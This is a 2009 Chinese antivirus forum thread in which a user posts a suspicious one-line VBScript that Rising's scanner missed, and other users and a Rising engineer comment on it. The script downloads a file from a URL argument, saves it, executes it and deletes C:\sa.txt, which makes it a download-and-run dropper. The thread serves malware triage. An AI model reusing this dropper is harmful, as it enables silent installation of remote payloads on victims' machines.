瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 大虾们看下这段代码,,瑞星报正常的
憑欄聽雪 - 2009-4-24 7:59:00
fn=wscript.Arguments(1):set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET",wscript.Arguments(0),0:x.Send():set m=CreateObject("ADODB.Stream"):m.Mode=3:m.Type=1:m.Open():m.Write x.ResponseBody:m.SaveToFile fn,2:set a=CreateObject("shell.application"):a.shellexecute fn:a.shellexecute "cmd.exe","/c del C:\sa.txt"



大家分析下这段代码,,瑞星报正常,真TMD……

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
左眼球 - 2009-4-24 9:46:00
是vbs脚本么?
调用cmd删除 C:\sa.txt
你去看看C盘下还有没有其他的脚本,有没有这个sa.txt
piao2008 - 2009-4-24 9:50:00
告知此段代码使用的网站页面地址或告知与此相关的完整代码
瑞星工程师14 - 2009-4-24 9:57:00
这段代码不能正常运行,不报是正常的。
1
查看完整版本: 大虾们看下这段代码,,瑞星报正常的